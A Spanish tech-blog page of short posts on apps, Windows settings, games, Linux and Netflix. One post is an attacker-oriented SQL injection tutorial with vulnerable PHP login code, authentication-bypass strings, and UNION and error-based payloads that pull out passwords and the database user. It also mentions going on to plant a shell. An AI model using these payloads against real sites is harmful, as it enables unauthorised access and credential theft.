Publicado el

PlayStation Messages: la nueva aplicación de mensajería para gamers

Sony separa sus aplicaciones móviles en dos partes: PlayStation Messages será exclusiva para conversaciones, y elimina los chats de la app compañera de PS4.

PS4Logo

Sony lanzó hoy una nueva aplicación independiente de mensajería para manejar tus conversaciones de PSN. La app compañera para iOS y Android recibió hoy una actualización que requiere instalar PlayStation Messages en nuestros dispositivos para poder seguir disfrutando de las funciones de chat con nuestros amigos de PS4 en el móvil.

La nueva aplicación es mucho más rápida que la de PlayStation, quien la ha usado sabe que se hace viejo esperando tan solo a que abra. Además soporta grupos, tiene stickers de muchos videojuegos, y te permite descargar las imágenes que compartes o te envían desde un PS4 a tu móvil.

playstation-messages

 

Publicado el

iOS 9 VS Android 6, Con Cual te quedas?

ios-9-vs-android-6-comparativa-interfaz-usuario

iOS 9 vs. Android 6.0 Marshmallow Apple y Google son las dos empresas con más usuarios en sus sistemas operativos para móviles. Millones de personas alrededor del mundo eligen entre una y otra alternativa, defendiendo los iPhone o los móviles Android de diferentes fabricantes. Cada año hay una nueva batalla a medida que salen actualizaciones y nuevas versiones de los sistemas operativos, y con iOS 9 no iba a ser distinto. Desde TodoiPhone.net hemos decidido hacer una comparación entre las más recientes versiones de ambas plataformas. iOS 9 por el lado de Apple, y Android 6.0 Marshmallow por parte de la gente de Google.

ios-9-vs-android-6-0-marshmallow-home-screen (1)

Disponibilidad

De momento iOS 9 está disponible en los nuevos iPhone 6s y iPhone 6s Plus, así como en dispositivos más viejos desde el iPhone 4s hasta el iPad 2. En cambio, el sistema operativo Android 6.0 Marshmallow únicamente corre en los nuevos teléfonos móviles Google Nexus 4X y 6P, y en algunas unidades de la generación anterior. Tanto uno como otro tienen sus ventajas y desventajas, desde lo estético hasta lo práctico y funcional. Pero también hay que remarcar que ninguna de las dos actualizaciones representa un gran cambio a nivel estético. El diseño de ambos sistemas operativos parece estar más apuntado a conseguir un mejor rendimiento y funciones que trabajan en segundo plano para mejorar la experiencia del usuario. Distintos sitios web han realizado pruebas y encuestas para ver qué opinión tienen los usuarios acerca de los sistemas operativos, y de acuerdo a la votación llevada a cabo por la gente de PhoneArena.com, el ganador indiscutido es Android 6.0 Marshmallow. Te mostramos un poco, en imágenes y video, lo que sucede con al comparar los puntos más importantes en materia estética y de diseño de iOS 9 y Android 6.0.

ios-9-vs-android-6-0-marshmallow-lock-screen-347x309ios-9-vs-android-6-0-marshmallow-siri-google-now-search-347x307 ios-9-vs-android-6-0-marshmallow-settings-235x208 ios-9-vs-android-6-0-marshmallow-control-center-235x208

Los usuarios prefieren Android

Al menos eso se desprende de la encuesta de PhoneArena. El nuevo sistema operativo para móviles y tablets de Google consiguió 13,793 votos contra los 7,785 que acumuló iOS 9, la más reciente iteración de la plataforma móvil de Apple. Las respuestas detrás de esta diferencia pueden encontrarse principalmente en los grandes errores que tuvo iOS 9 con los dispositivos más antiguos. Al consumidor no le gustó tener tantas actualizaciones pequeñas en menos de 2 semanas (iOS 9.0.1 – iOS 9.0.2 y luego la versión final de iOS 9.1), y la respuesta fue un voto mucho más masivo hacia la iniciativa de Google con Android 6.0 Marshmallow, un sistema que, como se puede ver en las comparaciones, tiene un estilo minimalista bastante similar.

 

Publicado el

Como evitar que un usuario acceda al Panel de Control en Windows 10

El Panel de Control es uno de los elementos mas importantes del sistema operativo ya que constituye la puerta que da acceso a las aplicaciones  y programas del ordenador por lo que aveces es necesario restringir el acceso a el maximo si  el equipo es utilizado por mas personas.

Si te encuentras en una situación parecida te vamos amostrar de una forma rápida y sencilla Cómo evitar que los usuarios accedan al panel de control en su equipo ya sea de mesa o portátil con Windows .

Presiona Windows + R , para abrir la venta de ejecutar.

Captura de pantalla (1608)

Escribe gpedit.msc y presiona la tecla enter.

Captura de pantalla (1609)

En el panel izquierdo, haz clic en la opción de configuración de usuario/Plantillas administrativas/Panel de control.

Captura de pantalla (1613)

A continuación, en el panel derecho del Panel de control, haga doble clic en la opción Prohibir el acceso al Panel de control y configuración de PC.

Captura de pantalla (1614)

En la siguiente ventana, seleccione Habilitar , haga clic en Aceptar , a continuación, cierre el Editor de directivas de grupo.

Captura de pantalla (1615)

Apartir de ahora con la configuración que has hecho los usuarios no tendrán acceso a su panel de control.

Publicado el

Windows 10 usa tu ancho de banda para actualizar a otros, te decimos cómo evitarlo

Windows 10 finalmente ya está aquí y llega con muchas funciones que realmente estamos disfrutando, pero a su vez también llega con algunos fallos, pequeños y grandes. Aunque técnicamente esto no es un fallo, sí que comparte tu ancho de banda para ayudar a actualizar a otros sin tu permiso, pero tranquilo, te enseñamos a evitarlo.

Esta característica lleva el nombre de “Windows Update Delivery Optimization” y funciona prácticamente de la misma forma que las descargas por torrents, es decir, el protocolo P2P (peer to peer) para compartir archivos. La idea es que tu PC se une a una red de Microsoft que colabora en que la actualización del sistema (ya sea Windows 10 o las futuras actualizaciones) lleguen más rápido a los demás usuarios, una vez que tu la tienes.
Por un lado es una función bastante inteligente, no lo niego, pero por otro es un abuso de confianza (somos amigos, Micro, pero no presto mis cosas) dado que no solicita permiso al usuario. Sencillamente, de forma predeterminada, toma prestado un poco de tu ancho de banda para acelerar el proceso de actualización, ya sea para computadoras en tu red local o en cualquier parte del mundo.
Dicha función está activada por defecto en Windows 10 Home y Pro, aqui te damos los pasos para desactivarla:
  • Dirígete al Panel de Control
  • Accede al apartado de Windows Update
  • Luego a Opcioens Avanzadas
  • Allí accede al apartado de “Elegir cómo se instalan las actualizaciones”

Tienes tres opciones: activarlo para que comparta tu ancho de banda con PCs en tu red local y en el mundo, activarlo para que las comparta solo en tu red local (lo que podría ser útil para quienes tengan varios PCs) o desactivarlo por completo.

Fuente: http://thenextweb.com/microsoft/2015/07/30/windows-10-steals-your-bandwidth-to-send-other-people-updates/

Publicado el

Super Mario Maker contará con tres ediciones para Europa

Uno de los juegos más esperados del año para Wii U, es Super Mario Maker, que aparecerá el 11 de septiembre en todo el mundo, pero en algunas regiones, lo hará de forma especial. En Europa, los jugadores podrán elegir de entre tres diferentes ediciones del juego.

Está la clásica, de la cual ya hemos comentado, que contiene el juego y algunas ilustraciones, pero se han agregado dos más. En una tenemos además del juego, el amiibo edición especial retro de Super Mario, ideal para los que ya tienen Wii U y desean un poco más, ahora bien, si no cuentas con la consola, el tercer paquete es la opción. Incluye un Wii U Premium, el juego y amiibo edición especial.

No se sabe si estos paquetes estarán disponibles en América. Muchas veces se confirman cuando ya la fecha está por llegar, tal vez se haga mediante un Nintendo Direct, pero esto lo sabremos en las siguientes semanas.

Fuente: http://revistaclubnintendo.com/site/?p=10507

CN_MM

Publicado el

Strml – Una web que se construye sola

Si estas aprendiendo a programar páginas web, a entender mejor lo que se puede hacer con CSS y a jugar con HTML5, echad un vistazo en strml.net.

Se trata de un proyecto creado por Samuel Reeds, programador que decidió crear una web que se construye a media que leemos, ya que el texto, en inglés, va indicando las alteraciones que la propia web va sufriendo.

Nada más entrar veremos un texto negro con fondo blanco, texto que empieza a aparecer queriendo “más cambios”. A medida que el tiempo pasa, la propia web indica los cambios sufridos: columnas, colores, efectos… ayudando así a entender cómo afecta el código al resultado final.

La animación puede pararse en cualquier momento, siendo así un excelente recurso para comentarlo en clase, ayudando a entender mejor la estructura de una web moderna.

strml

 

Como ves en la imagen, el resultado final no es impresionante, pero sí muy didáctico. En este caso está claro que lo que importa es el camino recorrido, y la original forma de mostrarlo.

Publicado el

PornHub Regala Computadora a Usuario

Una web porno regala un portátil a un usuario que rompió el suyo al ser descubierto  su madre

qr25D

Denzel, un joven inglés, tuvo que romper su ordenador portatil mientras veía porno para que su madre no le pillara. Desolado por ello, optó por desahogarse publicando su historia en Twitter. Mencionó a la página web que estaba viendo cuando ocurrió todo y, lejos de lavarse las manos, la empresa optó por ayudarle.

d1Kzr

Pornhub, una de las web de porno más potentes a nivel mundial, quiso consolar a su fan. No solo respondieron a Denzel a través de Twitter, sino que fueron un paso más allá y le mandaron un nuevo portatil por ser «un fan tan leal».

Según el diario británico The Mirror, el propio vicepresidente de la página web, Corey Price, se ha preocupado mucho por lo sucedido y ha mandado ánimos al joven. «Queremos obsequiarle con un ordenador nuevo y un pack de Pornhub para su placer continuo», aseguró Price.

 

LR6o

El joven inglés se ha ganado una fama a nivel mundial por su portátil roto. Con dos nuevos tuits ha mostrado a todo el mundo el obsequio de Pornhub y les ha dado las gracias.

6vx8d

 

Publicado el

Se libera elementary OS Freya

Elementary OS

Después de poco mas de año y medio de desarrollo se libero la nueva versión de esta popular distribución de Linux, presentando 3 nuevas aplicaciones, un sistema de notificaciones nuevo, una vista nueva de las aplicaciones en ejecución, muchas mejoras y mas de 1,100 correcciones.

Para quienes no están familiarizados con esta distro, esta basada en Ubuntu (Freya esta basado en Ubuntu 14.04), con su propio entorno gráfico llamado «Pantheon» y la mayoría de sus aplicaciones por defecto propias, las cuales lucen bastante bien.

Aplicaciones

Según el comunicado de prensa de elementary OS la anterior versión llamada «Luna» fue descargada mas de 3 millones de veces, siendo de las 10 distros mas descargadas.

 

Publicado el

Tutorial SQL Injection ¿Como se Hace?

La inyección SQL es el ataque vía web, que aprovecha errores en la filtración de datos introducidos por el usuario, y que permiten a un atacante, tener control de cierta aplicación.

Atención

Es recomendable tener un poco de conocimiento en PHP para  el mejor entendimiento de los  Códigos.

Los ataques SQL pueden ser evitados de muchas formas, iniciare con algunos ejemplos de instrucciones vulnerables, con las “magic quotes” desactivadas.

Ejemplo 1

Código:
$us=$_POST[‘usuario’];
$pass=$_POST[‘pass’];
$sql=»SELECT * FROM usuarios WHERE user = ‘$us’ AND password=’$pass'»;
Código:
if(mysql_fetch_array($exc)){
echo «Inicio de sesión correcto»; // Esto fue modificado
}
Este es el tipico sistema de verificación de contraseñas. Utiliza la instruccion mysql_fetch_array(funcion de mysql, que devuelve falso si no hay ningún resultado, en la ‘querry’, o petición), asi que si no hay ningún resultado donde el usuario y el password conuerden, el resultado es false.

como podemos hacer que no devuelva false??

  • Con el password correcto
  • Haciendo trampa

En este caso como no conocemos el password correcto  usaremos la segunda opción:

Haciendo trampa.. se haría algo así:

esta es la petición que solo nos deja pasar si sabemos el password:
Código
SELECT * FROM usuarios WHERE user = '$us' AND password='$pass'ahora, ¿como se puede hacer que nos devuelva true aunque no sepamos el password, sabiendo que solo podemos modificar $pass y $us?
Supongamos que ponemos de usuario betito, y de password pass1234.
El usuario existe, pero no sabemos el pass..
la sentencia que SQL recibirá seria :

Código:
SELECT * FROM usuarios WHERE user = 'betito' AND password='pass1234'
Como no hay ningun campo donde el usuario y el password coincidan, nos devolvera false.
Ahora, con un poco de creatividad:
de usuario:   betito
de password: ‘ OR »=’la sentencia SQL recibira:

SELECT * FROM usuarios WHERE user = 'betito' AND password='' OR ''=''

nos devolvera true, si hay algun resultado y como NADA siempre es igual a NADA, nos devolvera true, y pasamos el mecanismo de validación como el usuario betito.

Otros posibles valores que devuelven true son:

  • usuario: betito AND /*   password: */ »=’
  • usuario: ‘ OR 1=1 //

Ahora… que si quisieras saber el password.. (te advierto, que normalmente esta cifrado, y deberas desencriptarlo, con alguna herramienta para eso como john the ripper), tomemos el siguiente ejemplo.

Ejemplo 2
Código:
$us=$_POST[‘usuario’];
$pas=$_POST[‘pass’];
if($_GET[‘usuario’] || $_GET[‘pass’]){
die(«Hack Attempt»);
}
$sql=»SELECT password FROM usuarios WHERE user = ‘$us'»;
Código:
$resp = mysql_query($sql) or die(mysql_error());
if(mysql_fetch_array($resp)){
if($resp==$pas){
echo «Inicio de sesión exitoso»; // Esto fue modificado
}else{
echo «el password $resp es incorrecto»;
}
}
 Bien, este ejemplo, que se ve mucho mas seguro  y surge la pregunta , ¿es vulnerable?
SI, ¿porque?
Ya quedamos en que no hay magic quotes, las magic quotes son una función que trata de desactivar todas las cadenas introducidas por el usuario, que parezcan peligrosas, como comillas, diagonales, \0 etc..
el webmaster pensó, que como no usaba el mysql_fetch_array, entonces no podian usar un ‘ OR »=’, como la inyección clasica, pasada.Ahora, queremos sacar el password.. pero.. ¿como?

Hay una instruccion en SQL llamada UNION, que sirve para obtener información de 2 tablas, o..
Bueno.. UNION necesita algunos requisitos.

  • Necesitas meter la misma cantidad de valores que tiene la tabla.
  • Tener un informe de los errores que provocaremos en la instrucción

Bien ahora empezemos.
la instrucción a modificar es la siguiente:

Còdigo:
SELECT password FROM usuarios WHERE user = '$us'como ejemplo, si colocamos de usuario: maestro
la instrucción que llega seria:

 

Código:
SELECT password FROM usuarios WHERE user = 'maestro'

regresemos al UNION.

UNION necesita que el numero de columnas sea igual, sino sacara un error.

y exactamente, lo que necesitamos es un error, que nos diga cuando estamos mal, para saber cuando estamos bien.

el UNION se usa de esta forma:

usuario: ‘ AND 0 UNION SELECT 1 AND ‘l’=’
SELECT password FROM usuarios WHERE user = '' AND 0 UNION SELECT 1 AND 'l'=''

para lo cual SQL nos respondera:

Código Regreso:
The used SELECT statements have a different number of columns:SELECT password FROM usuarios WHERE user = » AND 0 UNION SELECT 1 AND ‘l’=»

Continuando por el mismo camino, podemos hacer que nos regrese un error, al tratar de UNIR un campo de tipo INT (osea que guarda numeros) a un CHAR (guarda letras)

Quedaria algo así:

‘ UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = ‘maestro’

la sentencia seria esta:

SELECT password FROM usuarios WHERE user = '' UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = 'maestro'

que nos da como error:

Codigo
Syntax error converting the varchar value ‘12345’ to a column of data type int.

donde el password es 12345

Las inyecciones ultimamente han logrado tener mas poder que antes,  debemos sacar toda la información posible, y con un poco de esfuerzo, conseguimos tener control de archivos (crear, borrar, etc..).el siguiente es un ejemplo, con la misma sentencia usuario:

Código:

‘ AND 0 UNION SELECT 1,user(),3,4,5 AND ‘l’=’

y nos regresa:

Código Respuesta:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation ‘UNION’

que significa esto? que estamos metiendo valores en utf cuando debe ser en latin1.. eso lo arreglamos asi:

‘ AND 0 UNION SELECT 1,convert(user() using latin1),3,4,5 AND »l=’

y eso nos regresa:

Código Shell:
root@localhost
esto, no es todo, con hacer que regrese valores con ‘<??>’, podemos incluso crearnos nuestra shell.
Bueno amigos esto fue todo el tutorial esperando sus comentarios .
Nos vemos en el siguiente Tutorial.
Publicado el

Netflix Bloqueara el Uso de VPN y Proxys.

netflix-television

Los servicios de streaming como Netflix son siempre más variados en Estados Unidos, por ello, muchos de nosotros utilizamos un pequeño truco con el cual podemos ingresar al catálogo de ese país, pues bien, parece ser que la compañía lo ha hecho de nuevo (la primera fue su cambio de costos) y aparentemente ha comenzado a bloquear proxys o VPN.

Con los proxys y VPN podíamos hacer pensar a nuestra computadora que estábamos en otra parte del mundo, pues a Netflix no le ha gustado nada y lo ha comenzado a bloquear, por ejemplo, en la aplicación de Android solamente puede acceder con un proxy de Google, lo cual inhabilita cualquier modificación.

descargaPor otro lado, usuarios de TorGuard han informado a TorrentFreak que varios de ellos han sido bloqueados al usar uno de esos trucos, pero que ciertamente se trata de casos aislado como para mencionar de una redada o implementación masiva.

 

Lo que sabemos por ahora es que posiblemente Netflix utiliza el navegador de tu computadora o el GPS de tu smartphone o tablet para establecer el huso horario que tienes y así verificar el lugar de donde estás visualizando el contenido, esperemos que pronto se anuncie por lo menos que se está bloqueando o sino, que simplemente dejen las cosas como están.